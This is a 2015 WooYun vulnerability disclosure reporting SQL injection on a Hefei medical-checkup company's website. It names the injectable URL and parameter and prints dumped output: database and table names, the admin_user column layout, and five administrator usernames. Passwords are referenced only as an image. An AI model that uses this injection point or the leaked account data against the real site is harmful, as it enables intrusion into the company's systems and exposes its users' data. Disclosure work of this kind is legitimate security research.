当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137304

漏洞标题:慈铭体检集团之合肥站注射

相关厂商:慈铭体检集团

漏洞作者: 冷白开。

提交时间:2015-08-28 10:30

修复时间:2015-10-12 10:32

公开时间:2015-10-12 10:32

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

慈铭体检集团之合肥站注射

详细说明:

注射点:

http://www.hefeiciming.com/tjsb_list.php?cat_pid=33&cat_id=34

1.png

脱出数据

available databases [2]:
[*] information_schema
[*] sqlhefeiciming
Database: sqlhefeiciming
[28 tables]
+------------------+
| user |
| admin_mod |
| admin_user |
| admin_useroption |
| art_dis_config |
| article |
| category |
| cnt |
| color_code |
| comes |
| company_email |
| control_sys |
| cr_columninfo |
| doc_useroption |
| docuser |
| edit_type |
| info_set |
| information |
| iplist |
| message |
| order_goods |
| order_product |
| set_value |
| shopproduct |
| shopuser |
| shu |
| survey |
| urls |
+------------------+
Database: sqlhefeiciming
Table: admin_user
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| date | datetime |
| id | int(11) |
| realname | varchar(40) |
| username | varchar(64) |
| userpswd | varchar(64) |
| usertype | varchar(20) |
+----------+-------------+
Database: sqlhefeiciming
Table: admin_user
[5 entries]
+-----------+
| username |
+-----------+
| admin |
| cm_admin |
| seo123 |
| web_admin |
| wj_admin! |
+-----------+

密码

2.png

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论